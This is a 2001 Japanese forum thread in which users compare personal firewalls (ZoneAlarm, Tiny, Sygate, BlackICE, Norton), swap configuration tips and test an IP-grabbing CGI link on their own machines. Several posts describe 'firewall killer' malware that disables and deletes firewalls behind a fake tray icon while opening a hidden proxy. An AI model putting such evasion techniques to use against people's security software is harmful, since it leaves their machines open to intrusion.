ファイアーウォールソフト 総合スレッド Part2

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
皆さん、自分のPC大丈夫ですか?
ファイアウォールで不正侵入などを
防ぎましょう・・・。

前スレ、Windows板[ファイアーウォールソフト 総合スレッド]はこちら。
http://yasai.2ch.net/test/read.cgi?bbs=win&key=990201178

目次
>>2 【各種 Firewall】 【ログ解析ツール】 【日本語パッチ 等】
>>3 【セキュリティ チェックサイト】 【Whois】 【解説サイト】 【過去 & 姉妹スレ】
2名無しさん@お腹いっぱい。:2001/06/04(月) 18:15
【各種 Firewall】

ZoneAlarm
http://www.zonelabs.com/

Sygate Personal Firewall
http://www.sygate.com/

Tiny Personal Firewall
http://www.tinysoftware.com/pwall.php

AtGuard
http://download.lycos.com/swbasic/BasicResults.asp?query=atgd322

BlackICE Defender
http://www.toyo.co.jp/security/

Snort for Win32
http://www.datanerds.net/~mike/snort.html


【ログ解析ツール】

ICEWatch
http://keir.net/icewatch.html

ZoneLog Analyser
http://zonelog.co.uk/

TPF Log Analyzer (Tiny Personal Firewall用)
http://server47.hypermart.net/tinyfirewall/

【日本語パッチ 等】

ZoneAlarm Pro体験版
http://www.zonelabs.com/zap_download_trial_4.htm

ZoneAlarm 日本語化パッチ その 1
http://etcd.virtualave.net/

ZoneAlarm 日本語化パッチ その 2
http://www.ryulife.com/net/security/index.html

Tiny Personal Firewall 日本語化パッチ
http://www.geocities.co.jp/SiliconValley-Cupertino/2943/
3名無しさん@お腹いっぱい。:2001/06/04(月) 18:15
【セキュリティ チェックサイト】

Shields UP !
https://grc.com/x/ne.dll?bh0bkyd2

Shields UP ! の日本語解説サイト
http://yasai.2ch.net/test/read.cgi?bbs=win&key=971411733&ls=100

[セキュリティ板] 最強のファイアーウォールソフトって何かな?
http://ton.2ch.net/test/read.cgi?bbs=sec&key=988724444&ls=100

[パソコン一般板] 自分のパソコンへの不正侵入対策してますか?2
http://salad.2ch.net/test/read.cgi?bbs=pc&key=980600110&ls=100

[パソコン一般板] 自分のパソコンへの不正侵入対策してますか?
http://salad.2ch.net/pc/kako/975/975513933.html

[初級ネット板] 簡易ファイアーオール
http://mentai.2ch.net/hack/kako/972/972826108.html
41:2001/06/04(月) 18:18
この、スレッドはセキュリティー板の方がいいと、
言うことになりましたので、こちらに移動しました。
何卒、ご理解いただけるようにお願いいたします。
5名無しさん@お腹いっぱい。:2001/06/04(月) 19:00
荒らされないよう、とりあえずsageときな。

セキュリティがなってねえぞ!
6名無しさん@お腹いっぱい。:2001/06/04(月) 19:19
ZoneAlarm使っているんだけど、
アラームが出た後に、ウィンドウが
タスクバーと重なってしまうことありませんか?。
(板違いなのは承知ですが、ファイアウォール
の話はここしかないのでねぇ〜...)
7名無しさん@お腹いっぱい。:2001/06/04(月) 20:25
hf
8名無しさん@お腹いっぱい。:2001/06/05(火) 03:42
>>4
かってに決めないでね、いい子だから。よしよし。

そんなことしてると、誰にも相手にされないよ。

現に、人がいないね。
9名無しさん@お腹いっぱい。:2001/06/12(火) 01:45
いちおうあげますか…
10名無しさん@お腹いっぱい。:2001/06/12(火) 11:24
フリーのやつで特定のポートを民衆に開放するって設定は出来るんでしょうか?
出来ないと自宅鯖がヒッキーになってしまう…
11名無しさん@お腹いっぱい。:2001/06/12(火) 11:27
>>10
ぞねはできるよ
12名無しさん@お腹いっぱい:2001/06/12(火) 12:27
前からちょっと気になってるんだけど、Zoneのね、トラヒックモニタ
(転送量表示するアレ)が効かないアプリとか有るんだ
RegetとかCUTEでFTP使ってると全然転送量が変わらないの
これ何とかならないかなぁ・・・・
穴開いてる訳じゃ無くて、PORTの方はちゃんと監視出来てる
見たいなんだけど、ちょっと気になるっす。
13名無しさん@お腹いっぱい。:2001/06/12(火) 12:33
誰も使ってないみたいなので、ちょっと AtGuard を入れてみたけど、
これって最高なんじゃない?
少なくとも某3強よりも気に入った。
ルールを逆引きでも設定可能だし、自宅鯖にも使えるからねぇ。
14 :2001/06/12(火) 13:54
Sygate Personal Firewall の日本語パチない?
15名無しさん@お腹いっぱい。:2001/06/12(火) 13:58
Sygateって日本語化しないといけないぐらいの英語だったっけ?
16名無しさん@お腹いっぱい:2001/06/12(火) 14:02
>>12
そうまでしてMP3落した量測りたいか
この割れ厨がっ!!
17名無しさん@お腹いっぱい。:2001/06/12(火) 15:32
Sygateのパッチはないよ
それにしてもOutpostちょっと不安定だ
1812 :2001/06/12(火) 22:59
>>16
違うって、^^;; そう言う意味じゃなくて、この場合少なくともトラヒックモニタ
はパケットが監視出来てないっていう事でしょ? それが何となく気になるんすよ
ゴチャゴチャしてるうちにPORTもおっひろげに成らないかなとか・・・・
転送量なんか何でも測れるじゃーーん
19名無しさん@お腹いっぱい。:2001/06/12(火) 22:59
>>12
苦しいな(w
20名無しさん@お腹いっぱい。:2001/06/13(水) 11:14
BlackIceで0.0.0.0のFilter failedが出るんだがハックされてるのだろうか?
ちなみにWin2000
21名無しさん@お腹いっぱい。:2001/06/13(水) 12:54
>>20
俺もコレは知りたい。
どういう状態でカウントされてるんだ?
22名無しさん@お腹いっぱい:2001/06/13(水) 23:53
フリーウェアなのはどれ?
23名無しさん:2001/06/14(木) 00:01
>>20-21
(-.-")凸 FAQ!
http://www.toyo.co.jp/security/ids/support/faqj/attack/qj00030.html

>>22
>>3で紹介されてる↓に行って調べてみな。
http://members.tripod.co.jp/eazyfox/
24名無しさん@お腹いっぱい:2001/06/15(金) 01:00
zone alarmダウンロードできない

Thank you for choosing ZoneAlarm version 2.6 to secure your Internet-connected PC.
Your download will begin momentarily.

ってとこでずっと持っているんだけど
25名無しさん@お腹いっぱい。:2001/06/15(金) 01:07
>>24
Asiaから落とそうとしてるのかな?
USからの方がいいよ。
2624:2001/06/15(金) 01:14
>>25
ありがとう
出来ました
27名無しさん@お腹いっぱい:2001/06/15(金) 09:05
素朴な疑問。
どーして2ちゃんではファイアウォール=パーソナルファイアウォールなんでそ?
濃い方が多いのに
28名無しさん@お腹いっぱい。:2001/06/15(金) 13:23
>>27
飽きただけと思われ。
情報流が業者に限られるのもあるが。
しりたきゃ、英語ページ読むか、日経雑誌読むか、
その筋のセミナーでも行ったほうが早い。
業務用を2chで批評しても、不毛に終わることが多いし。
そういう意味じゃ、MS系は批評(批判)多いから、
MSがその程度っつうことかもな。
29名無しさん@お腹いっぱい。:2001/06/16(土) 03:28
すんません、ここで聞いていいんでしょうか、
ノートンのオプションでイベントログってのを昨日初めて
見たんですが、1日1〜3回くらいこんなの

未使用ポートブロック機能が通信をブロックしました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 209.12・・・・・

出てるんです。これってなんでしょう?時間を見ると、ちょうど
何もしてない状態でマウスが1,2秒間砂時計になってる時
でした。
30名無しさん@お腹いっぱい。:2001/06/16(土) 04:19
>>29
どっかから君のPCにアクセス
 ↓
それをノートン大先生がブロック
 ↓
(゚д゚)ウマー
 ↓
でも、フリーでノートンよりも良いのはある(ノートン、重い)
 ↓
(;´Д`)
31名無しさん@お腹いっぱい。:2001/06/16(土) 08:10
ノートン先生使ってますが、Windowsの共有が使えなくなりました。
設定をどのようにかえたらよいのかわかりません。OSはWindows2000です。
マニュアルみろとか言われたけど、おまけで付いてたやつなので無理なので
教えてくだされ
32名無しさん@お腹いっぱい。:2001/06/16(土) 10:24
>>29
ポート書けよ!アホカ
syslogじゃねーのか?
あ、tcpか。
どっちにしても、ポート書かなきゃわかんねーだろが。
メンドクセーから屍鰻てっくに聞けよ。
33名無しさん@お腹いっぱい。:2001/06/16(土) 16:34
NETBEUIで共有エヘヘ
34名無しさん@お腹いっぱい。:2001/06/16(土) 16:36
TCP/IP over NETBIOS
を有効。これは勧めません
35名無しさん@お腹いっぱい。:2001/06/16(土) 17:18
>>31
農豚は外と中の設定が一緒だから、わずらわしいぞな。
ローカルアドレスに限って137のUDPと139のTCPを許可しとくぞな。
プロセスもSYSTEMに限定しとくぞな。
3629:2001/06/16(土) 21:38
シリアルポート1 (ティーエーニツナイデ、ネットヨウ)
usb2 (ソノウチ1コ ティーエーニツナイデ ティーエー ソウサヨウ)

フレッツ。
37名無しさん@お腹いっぱい。:2001/06/17(日) 03:10
http://www.guest.marunouchi.co.jp/
なんかの交際クラブがアクセスしようとしてきた。
こんなとこ知らんのに…
38名無しさん@お腹いっぱい。:2001/06/17(日) 03:13
www.tv-asahi.co.jp
何でテレビ朝日も・・・
39名無しさん@お腹いっぱい。:2001/06/17(日) 17:07
Windows2000SP2入れて以来、ぞぬのCPU使用率が100%になっちゃう。
前スレで同様の症状の人みつけてちょっと安心しつつTiny入れたけど、
SP2入れてぞぬが普通に使えてる人との違いが気になる・・・いるのか?
IEが5.02sp2って以外、かなり素の状態のWindows2000なのになぁ
40名無しさん@お腹いっぱい。:2001/06/17(日) 23:38
>>39
ああ、Win板の方で言ってる人いたね。
まあなんでかは解からないけどZone使うことも
ないじゃん。TinyとかSygateの方が全然いいし。
4139:2001/06/18(月) 00:53
>>40
返事ありがと。

で、実際Tiny見てみて、ポリシー設定が何かFirewall-1っぽい感じのGUIなのがかなり好印象で
先々はTiny使うつもりなのは確かなんだけど、使いこなせるまでの間使いたいのと、
単純に明確な原因が分かればいいかなぁと。
SP2が原因だって分かっちゃえばそれでいいんだけど、SP2使用者で
普通に使えちゃってる人がいたら、なんだかなーだし。

W2KでICS使ってる場合の設定が分かれば、TinyおんりーでOKなんだけどね。
SourceAddressの指定ができるのか知りたい。
DistinationAddressとDistinationPortは簡単に指定できるけど。
42名無しさん@お腹いっぱい。:2001/06/18(月) 02:05
何か用事か?東めた。
いつもチョコチョコ来てるけど。
a. [IPネットワークアドレス] 211.15.33.0
b. [ネットワーク名] TMC
f. [組織名] 東京めたりっく通信株式会社
g. [Organization] Tokyo Metallic Communicates.
TinyからZoneに入れ替えてから2回目です。
43名無しさん@お腹いっぱい。:2001/06/18(月) 02:25
>>41
今Sygate使ってるからTinyは覚えてないけど、
ソースアドレスはさすがに・・・もちろんSygateも無理
4439:2001/06/18(月) 09:23
>>43
うーん、Proxyでも立てるかなぁ。
まあ、色々やってみるわ。
ありがとね。
45田無しさん@お腹おっぱい。:2001/06/18(月) 09:53
ttp://www.digitalstar.ne.jp/
これどう??
46名無しさん@お腹いっぱい。:2001/06/18(月) 10:40
Tiny って ICS との相性がムッチャ悪いんじゃなかったっけ?
47名無しさん@お腹いっぱい。:2001/06/18(月) 10:59
ICSってなんだい?
48名無しさん@お腹いっぱい。:2001/06/18(月) 11:42
>>45
悪くないけど、定価60万だよ〜。
今ならキャンペーン期間中で49万になるらしい。
49名無しさん@お腹いっぱい。:2001/06/18(月) 11:44
>>47
I・・・インターネットを
C・・・共有
S・・・する

というわけで「インターネット接続の共有」の事ね。
5039:2001/06/18(月) 15:28
>>49
そゆことです。
Microsoftもそう呼んでるみたいだから、ってことで略しっぱなしで言っちゃった。てへ。
http://support.microsoft.com/support/kb/articles/Q234/8/15.asp

>>46
やっぱそうなのかなぁ。
まあ、のんびり情報集めて頑張ってみるて、駄目なら考えるわ。
51名無しさん@お腹いっぱい。:2001/06/18(月) 16:06
>>50

まあそれならTinyにこだわらなくてもいいかもね。
ICSとは関係無いけど、ファイヤーウォール選ぶなら
ここのレビューとかも結構参考になるかも。頑張ってくれ

http://securityportal.com/firewalls/personal/
52名無しさん@お腹いっぱい。:2001/06/18(月) 16:25
忘れてた、一応これもね。
有名だから知ってると思うけど

ttp://members.tripod.co.jp/eazyfox/
53ootyfdddddddddds:2001/06/18(月) 22:05
荒らし依頼、自慢掲示板
Duke

(かぐや総本部)
http://hp.bank-sakura.com/kgy999/
5439:2001/06/18(月) 22:12
>>51
重ね重ね、本当にありがとね。
51の方は知らんかったわ。

ま、前ぞぬ入れてたときも、大した攻撃なかったし、気長にがんばってみるわ。



・・・なんかほのぼのしてる気がする(w
55名無しさん@お腹いっぱい。:2001/06/18(月) 23:03
>>52
知ってるも何も...
>>1-3を見てやってよ。じゃないと無意味になってしまう。
5652:2001/06/19(火) 00:36
>>55
すまん、すっかり忘れてた
57名無しさん@お腹いっぱい。:2001/06/19(火) 04:05
windowsのファイル共有つかいたいんですが、どのポートあけたらいいのかおしえてください
58名無しさん@お腹いっぱい。:2001/06/19(火) 12:23
netbios-ns 137/tcp NETBIOS Name Service
netbios-ns 137/udp NETBIOS Name Service
netbios-dgm 138/tcp NETBIOS Datagram Service
netbios-dgm 138/udp NETBIOS Datagram Service
netbios-ssn 139/tcp NETBIOS Session Service
netbios-ssn 139/udp NETBIOS Session Service
59名無しさん@お腹いっぱい。:2001/06/20(水) 13:02
58さんありがとうございます。あなたは神様のようなかたです。
こんな掲示板で暖かい心になったのは初めてです。
60ぴろゆき@管‎直人:2001/06/20(水) 14:08
>>59
こんなとは何だ!
61名無しさん@お腹いっぱい。:2001/06/20(水) 14:09
会社でwinMXを使いたいんだがファイヤーウォールのせいでうまくつなげない
ファイヤーウォールの種類とかもわからないんですが
設定の仕方が悪いんでしょうか?
winMXが使えない仕様のファイヤーウォールもあるんでしょうか?
「SOCK4を使う」「SOCK5を使う」という設定があるんですが
両方試してみたのですがダメっぽいです
無知ですいません
ICQも同様で使えません
62名無しさん@お腹いっぱい。:2001/06/21(木) 00:02
無知ですいませんとか言ってないで
生まれてすいませんと言え
63無しさん@お腹いっぱい。 :2001/06/21(木) 12:21
会社にこそすいませんと言え
64名無しさん@お腹いっぱい。:2001/06/22(金) 04:18
NT系の OS は自前で TCP/IP のフィルタリングが出来るようですが、
これってファイヤーウォールの代りとして充分なんでしょうか?
6561:2001/06/25(月) 12:57
生まれてすいません
会社にすいません
66名無しさん@お腹いっぱい。:2001/06/25(月) 23:02
黒氷って、こっちが監視されるって言う話を聞くがどうなの?
購入を検討しているのだが、そこが気になる。
67名無しさん@お腹いっぱい。:2001/06/26(火) 10:45
PCGATEってぞぬがバージョンアップしてもそのまま?
メジャーバージョンアップしたらまた\3500取るの?

そうだったら嫌すぎ。
68名無しさん@お腹いっぱい。:2001/06/26(火) 12:53
>>66
??? んなこたぁないよ

>>67
NECならやりかねんな。つーかPCGATEなんか使うな
69名無しさん:2001/06/26(火) 14:04
>>64
どの程度のものをファイアーウォールというかによるなぁ。
こまい設定ができなくて、メインにすえるには無理があるかも。

でも、やらないよりはやるべきだよな。
70名無しさん@お腹いっぱい。:2001/06/26(火) 18:12
>>61
ポートの関係じゃないんですか?
確かWINMxは6699を利用していて
1024までのポートを何とか何とかとか言ってたな?
つーかマンコ
71 :2001/06/26(火) 20:44
>>61
それが貴方の会社のポリシーによる設定なら、従うしかないんで無いの?
それか管理者に問い合わせて確認取るか。
というか、>65の書きコ見ると業務上正当な事由じゃないのね(w
72名無しさん@お腹いっぱい。:2001/06/26(火) 21:00
>>71
どんな業務でWinMXとICQを使うんだよ(w

>>61
WinMXが使えない仕様のファイヤーウォールなんてものは
無いよ。ただ使えない設定になってるだけ。会社のファイヤー
ウォールでそんなポート通過させる訳ないっしょ。
73 :2001/06/27(水) 07:45
最近よく落ちるなーと思ってたら(Windows2000)Outpostが原因でした。
ZoneAlarmやBlackICEにしてみたら全然落ちない。
Outpost自体は気に入ってるので更なる改善を望みます。
74名無し@お腹いっぱい:2001/06/27(水) 11:51
私も一時BlackICEにしたけど、今はZomeAlarm。
75名無しさん@お腹いっぱい。:2001/06/27(水) 19:04
ZomeAlarmの最新版は大丈夫なんですか?
76名無しさん@お腹いっぱい。:2001/06/27(水) 23:50
>>75
大丈夫ってどこらへんのことを聞いてるの?
77名無しさん@お腹いっぱい。:2001/06/27(水) 23:57
>>76
あそこらへんのことですが何か?
78 :2001/06/28(木) 00:09
>77
ソコはイヤーン
79名無しさん@お腹いっぱい。:2001/06/28(木) 01:17
最近ぞねからTinyに変えたものです。
Tinyのアクセスのログってどこで見るのでしょう?
ステータスウィンドウ>ログ>Firewallのログがずっと空欄のままです。
ping撃ってもらってアラートは出たんですがログは残らないし、Shield up!
のページでテストしてもアラートもログも出ません(全部ステルスでしたが)
filter.logを出力する設定にはしてます。どこで見れるのでしょうか?
80名無しさん@お腹いっぱい。:2001/06/28(木) 01:29
Outpost単独で入れるのこわいなー。
他のFWと共存してる人いる?
81名無しさん@お腹いっぱい。:2001/06/28(木) 01:53
>>79
ルールを作ってないからだよ。
Win板だけどここらへんを参考にすれば?
http://yasai.2ch.net/test/read.cgi?bbs=win&key=990201178&st=238&to=238&nofirst=true
http://yasai.2ch.net/test/read.cgi?bbs=win&key=990201178&st=728&to=728&nofirst=true

もっと細かく作るなら、
http://server47.hypermart.net/tinyfirewall/rules.html
英語だけど↑を参考にするといいよ。
いちいちルール作るの面倒だと思うなら他に乗り換えた方がいいよ。
(ちなみに日本語化パッチは>>2にあるサイトで)
82名無しさん@お腹いっぱい。:2001/06/28(木) 02:30
>>81
わかりました!ご丁寧にありがとうございます!
後はお客さん待ちです。ワクワク
83 :2001/06/28(木) 21:49
日本語版のフリーのファイアーウォールってありませんか?
84名無しさん@お腹いっぱい。:2001/06/28(木) 23:36
>>83
ぞぬを日本語化する
>>2参照
85名無しさん@お腹いっぱい。:2001/06/30(土) 02:19
>>83
Tinyを日本語化する
やり方は調べろ
86名無しさん@お腹いっぱい。:2001/06/30(土) 03:30
ノートンの試供版をつかってます。これってどうですか?
87名無しさん@お腹いっぱい。:2001/06/30(土) 03:35
ノートンっていくらなんですか?
88名無しさん@お腹いっぱい。:2001/06/30(土) 03:36
ノートンって誰ですか?
89名無しさん@お腹いっぱい。:2001/06/30(土) 03:43
ノートンなんですか?
90名無しさん@お腹いっぱい。:2001/06/30(土) 04:15
Nod
91名無しさん@お腹いっぱい。:2001/06/30(土) 06:43
ノートンのVer3ってどこが変わってんの?
てか、liveupdateしてれば自然と
ヴァージョンアップしてくれてんの?
9291:2001/06/30(土) 06:44
あ!既出の予感・・・まぁいいや
93ドキンちゃん:2001/06/30(土) 09:10
94名無しさん@お腹いっぱい。:2001/06/30(土) 10:16
BlackICEを導入して1ヶ月。しかし、未だアタックされた形跡がない。
喜ばしいことだとは思うが、本当に機能しているのか心配になってきた・・・。
95名無しさん@お腹いっぱい。:2001/06/30(土) 11:34
>>94
忘れた頃にアタックにきてくれるよ。
もし来たら感謝しよう。
96名無しさん@お腹いっぱい。:2001/06/30(土) 19:15
>BlackICEを導入して1ヶ月。しかし、未だアタックされた形跡がない。

常時接続してるんなら異常です。
一日一時間程度なら普通です。
97名無しさん@お腹いっぱい。:2001/06/30(土) 19:45
BlackICE使ってるけど、ver2.5chjあたりから時々おかしな
動きをするようになった。動作してるはずなのに、アタックを
全然検出せず、画面右上のランプも点滅しない。う〜ん。謎。
98んー:2001/06/30(土) 21:36
ADSLで繋ぎっぱなしになったにも関わらずダイアルアップでテレホタイム
だけ繋いでいたときよりアタック減りました…
なんかBlackICEイマイチ信用ならんのでSygateかTiny使ってみます。
9994:2001/06/30(土) 21:51
やっぱ変ですよね。BlackICEは。
とっいうことでSygateに変えました。
100月光仮面:2001/06/30(土) 23:49
ZoneAlarm入れたら1時間に一回はプロテクトしたと警告メッセージが。
今フレADSLだけど、これってZA入れる前には気がつかないだけで
ばんばん来てたって事ですかね?
なんか怖くなってきたっす。
101名無しさん@お腹いっぱい。:2001/06/30(土) 23:59
同じくTinyに変えました。
ただ、やっぱり一番下に追加しておくルールのことが判りません。

プロトコル   "Any"
方向      "Both"
アドレスタイプ "Any address"
有効期限    "Always"

を、選んで遮断してログを残す&ダイアログを表示にチェックを入れて
名前付けて登録して一番下に置いとくだけで良いのでしょうか?

便乗で質問させてくださいませ。
102101:2001/07/01(日) 00:12
>>100
FWは初めてですか?
今日ずーっとFWスレ読んでたんだけど
”ネットワーク内は鉄砲玉が飛び交ってる世界”って書きこみを見ました。
その中で実際、悪意を持った鉄砲玉はほんのわずかしかないですよ。
安心してください。
103ぐああ:2001/07/01(日) 00:23
ぞぬからノートンにしたんだけど、とたんにネットが遅くなった…。
やっぱぞぬの方がいいのかなぁ?シンプルだし…。
104名無しさん@お腹いっぱい。:2001/07/01(日) 01:11
>>101
そうするとその規則の上にある全ての許可する規則にあてはまらないアクセス
(つまり不正アクセス)を弾くでしょ。それでいいのです。
上にある規則の方が優先度高いから、一番下にしとかなきゃダメよん。

>>100
102の言うとおり心配無いと思うけども同じとこから同じポート叩かれてたりするんなら
ここに書いてみれば?あとアウトバウンド(内>外)のアクセス要求があったら
ちょっと気をつけたほうがいいと思う。
105名無しさん@お腹いっぱい。:2001/07/01(日) 01:14
関係ないけどTinyでルール作るとき出来るだけポート絞ったほうがいいぞ。
この前IP抜きのCGIでRealPlayerから抜かれたから。(思いっきり全開だった)
当然絞ったら抜けなくなった。
106名無しさん@お腹いっぱい。 :2001/07/01(日) 01:54
>>105
RealPlayerから抜かれたというのはパッチで対応できないもの
なんですか?
ぞぬでは設定はできないですか?
107101:2001/07/01(日) 02:05
>>104
答えて頂きありがとうございます。
で、設定後はネット経由で使用したいアプリの時にその都度チェックを
はずしてわざと通してやるというわけですね。

>>105
ポートを絞れって・・・!?
たしか聞く所ではポートって65536もあるのでは・・・
許可してるアプリでも”Any port”ではいけないってことでしょうか?

余談ですがうちフレッツISDNなのですがIPアドレスが変わった模様です。
たぶん7月から発信先電話番号が統一されたことと関係があるのでしょうかね。
108名無しさん@お腹いっぱい。:2001/07/01(日) 02:25
>>104
>ここに書いてみれば?

おいおい冗談言うなよ。ここはアタック報告スレじゃない
109名無しさん@お腹いっぱい。:2001/07/01(日) 02:26
>>105

35 名前:名無しさん@お腹いっぱい。 投稿日:2001/06/27(水) 10:05
>>27よりこっちのほうがいいんじゃないか?
ちょっと感心したよ。そこまでして抜きたいかって感じ(w
俺も抜かれちゃったよ。さすがにMediaPlayerとかRealPlayer
はAskにしてなかったから。まあIPなんか抜かれても
どうでもいいんだけど。

http://samurai-x.hypermart.net/cgi-bin/kitty.cgi

多分これのことだろ
110名無しさん@お腹いっぱい。:2001/07/01(日) 03:09
ノートンPF買ったけど
マニュアルが不親切で全然わからん
なんとかならんの?
111名無しさん@お腹いっぱい。 :2001/07/01(日) 03:10
>>109
↑のcgi踏むとMediaPlayerやRealPlayerやWindowが何個か現れたんだけど
ZoneAlarmで許可をNoにしたら接続しなかったみたい。
これでももう誰かにIP抜かれてるの?
112111:2001/07/01(日) 03:12
追加:Telnet Programというのを遮った。
113名無しさん@お腹いっぱい。:2001/07/01(日) 03:19
>>108
>「同じとこから同じポート叩かれてたりするんなら」
>ここに書いてみれば?
ってこと。一週間同じやつから同じポーと延々と叩かれてたりしたら興味無いかい?

>>106-107
さぁ?どうなんでしょうね。
まぁこっちが接続さすのが悪いわけで。
ポートをしぼれっちゅうのはTinyならアラート出して
「適切なルールを作り次回から・・・」云々出てきたら下のボタン押して
このポートだけ許可するってとこ無いっけか。そーやって設定してください。
俺も厨で良くわからんが普段リアプレが落とすのに使うポートが80で、IP抜かれたときは
全然関係ないポートから来たからさ。(確か5桁の)

>>109
それっす。
114名無しさん@お腹いっぱい。:2001/07/01(日) 03:20
>>110
そんな難しい?
つか体験版あるのに,,,買うの早過ぎるよ。
115名無しさん@お腹いっぱい。:2001/07/01(日) 03:24
>>106
ごめん、ぞねはどうだっけ?ポート絞れないって事は無いと思うけど・・・
新しいプログラムの接続要求でポートも記憶してたような気がするんだけどなぁ・・・
ためしに109踏んで見たら?(w
116名無しさん@お腹いっぱい。:2001/07/01(日) 03:36
>>111
抜かれてない。抜かれたところでどうって事も無い。

>>113
悪いが興味ない。連続で同じポート叩いてくるような
奴は素人だろ。変なパケットが来たとかなら興味も
あるが、大抵はセキュリティサイトで調べればわかるし。
117106=111=112:2001/07/01(日) 03:42
>>115
>ためしに109踏んで見たら?(w

さっき試しに踏んでみたんです。
>>111にも書いた通り、Telnet Programの許可を尋ねるバルーンが
出てきてNoを選択したので接続は失敗したみたいです。
これってIPは抜かれてないんでしょうか?
118名無しさん@お腹いっぱい。:2001/07/01(日) 03:42
>>116
そーか、そりゃ失礼でした。同じポート狙うことは無いか。にしても
同一人物があの手この手でバッファオーバーフロー狙いとか断片化パケ投げとか
やってんならちょっとおもしろいなと思って。まぁ、
そこまで恨み買うような事してればですけど・・・
厨房丸出しのレスでごめんね。
119名無しさん@お腹いっぱい。:2001/07/01(日) 03:44
>>117
大丈夫、抜かれてないよ。つーことはぞねは勝手にポート絞ってくれるってことだね。
もちろん116の通り抜かれても実害ありませんが。まぁ、ログにリンク貼ってるから
ちょっと恥ずかしいかもしれないけどね(ワラ
120117:2001/07/01(日) 03:44
>>116
あー、すんません。
書くのに時間かかってたんです。
121名無しさん@お腹いっぱい。:2001/07/01(日) 03:46
>>114
薄っぺらいマニュアルだけで初心者にはさっぱり
ヘルプも今一だし・・・
1年間は無料でアップグレードできるよ。
122117:2001/07/01(日) 03:47
>>119
ありがとございます。
夜中なのに親切な人がたくさんいて嬉しいっす。
123名無しさん@お腹いっぱい。:2001/07/01(日) 03:48
>>119
ポートを絞ってるわけじゃない。
AllowでもDenyでもなく、Askになってるからだろ。
AskでYES NO聞かれて全部NOにすれば抜かれるわけないさ
124名無しさん@お腹いっぱい。:2001/07/01(日) 03:51
ああそうか、許可をたずねるバルーンね。許可にしたらどこまで許可されるんだろ。
まぁAskにしとけば問題ないけど・・・
125名無しさん@お腹いっぱい。:2001/07/01(日) 03:53
許可したらぞぬは全ポートAllowになるだろ。
ぞぬプロはポート制限できるみたいだが
126名無しさん@お腹いっぱい。:2001/07/01(日) 03:58
ポート制限できないのか!なんだかなー
まぁ初心者向けって事なのかなぁ・・・
127117:2001/07/01(日) 04:05
>>123
>AllowでもDenyでもなく、Askになってるからだろ。

Media Player,Real PlayerともAllowの設定でした。
ということは防いだのはTelnet Programだけで
両Playerとも接続はしてたってことなんですかね?
128名無しさん@お腹いっぱい。:2001/07/01(日) 04:07
>>127
あら、そうなんだ。じゃあ抜かれたね。116で抜かれてないって
書いちゃったけど、よく考えたらMediaPlayerもRealPlayerも
接続できませんって感じのメッセージが出るんだよな。
129名無しさん@お腹いっぱい。:2001/07/01(日) 04:13
俺ももう一回109試してみたけど抜かれちった。何でだろ。
リアプレのアクセスは拒否されてるしアラートも出てるんだけどな。
当然telnetとかはもちろん・・・うーん。
130名無しさん@お腹いっぱい。:2001/07/01(日) 04:16
>>109

http, ftp, gopher, https, pnm, mms, rlogin, tn3270, telnet, news
使って抜こうとする。

telnet.exe, MediaPlayer, RealPlayer, Newsクライアントの
接続ブロックすれば平気だと思うが
131名無しさん@お腹いっぱい。:2001/07/01(日) 04:19
まさかIEの制限してないとか・・・
132名無しさん@お腹いっぱい。:2001/07/01(日) 04:26
うおお!proxyomitron外していってみたらtelnetやらメールやらいろんなもの開いてびっくりした!
しかしよくかんがえたらomitronのポート制限してなかったんだよね・・・アホだ
あとIEってTinyだとデフォでアクセスできるようになってる気がするんだけど
133名無しさん@お腹いっぱい。:2001/07/01(日) 04:34
IEがデフォでアクセスできるんじゃなくて最初っからおみとろん通してたから
おみとろん許可したからそう勘違いしたみたい。
とりあえずおみとろんのポート80だけ許可にしたらIP抜けなくなりましたとさ。
134名無しさん@お腹いっぱい。:2001/07/02(月) 07:20
Tinyユーザですが、ローカルのポートを絞らないことによって
不正アクセスに利用されたりすることはありますでしょうか
ローカルのポートを絞ってしまうとリアルプレーヤなどでは
動画ごとにポートが違ったりして困ってます。
(そもそもローカルのポートがどういうものなのか分かってないのですが)
135名無しさん@お腹いっぱい。:2001/07/02(月) 10:54
ブラウザとかメーラーとか、絞れるものは絞った方が
いいけど、RealPlayerとかはほっといてよし。
136名無しさん@お腹いっぱい。:2001/07/02(月) 12:44
black ICEいれて一週間ぐらいたつけど、
誰もこない・・・・。
137名無しさん@お腹いっぱい。:2001/07/02(月) 13:23
便りが無いのは良い便り
138名無しさん@お腹いっぱい。:2001/07/02(月) 15:16
暇だからmegasecurityにあったマイナーなファイヤー
ウォールキラーの類をちょっと覗いて見たけど、やっぱ
AtGuardはもうダメだね。開発の止まったソフトはいかんわ。

The FireCracker automaticly detects AT Guard, Zone Alarm
and or McAfee Firewall, deactivates it and deletes it from
the harddisk.The original Firewall Icons are in the
taskbar all the time, so it looks like nothing is happened.
It also reloops the funktions that the victim must reboot
the cputo reinstall the firewall(s).100% Invisible

まあ俺がチェックしてなかっただけで、とっくの昔にリリース
されてたんだろうけど。
139名無しさん@お腹いっぱい。:2001/07/02(月) 15:38
ファイルの日付見たらやっぱり結構前から
あったようだ。リリースは今年の3月ぐらいか。
まあどうでもいいけど
140名無しさん@お腹いっぱい。:2001/07/02(月) 15:47
さらにZoneAlarmKiller系もチェックして見たけど、
TLのZAKillerはリリース日が4/9だけど、ZoneKillerは
6/12だね。もしかして最新バージョンにも対応してんのかな。

あとZAKillerはどうやってるのかと思ったら、Zone自体を
どうこうするんじゃなくって、Zoneのプロセスをkillして、
偽アイコンを表示させといて、裏でHTTPプロクシを立てるって
感じだね。ちょっと楽しそうだ。
141名無しさん@お腹いっぱい。:2001/07/02(月) 15:50
あっ、ZoneKillerの正式なリリース日は知らんよ。
ただファイルの日付見ただけだから。まあとにかく
ぞぬ使いは気をつけてね
142名無しさん@お腹いっぱい。:2001/07/02(月) 19:32
ぞぬやめた方がいいのかな
143名無しさん@お腹いっぱい。:2001/07/02(月) 23:45
結局、初心者はゾヌがオススメですか?
144名無しさん@お腹いっぱい。:2001/07/02(月) 23:54
なんでそうなる(w
145名無しさん@お腹いっぱい。:2001/07/03(火) 00:30

          /\
        /    \/\
        |\   /    \/\
      /\  \ |\    /    \/\
    /    \  |  \  |\    /    \/\
    |\    /  .|       \  |\    /    \ /\
   / \ \/    |             \  |\   /    \/\
 /    \ |    .|                 \ |\    /    \/\
 |\    /|     |                      \|\    /    \
 |  \ //\                             \ /        \
 |   |/    \                      ウワァン!  /\          >
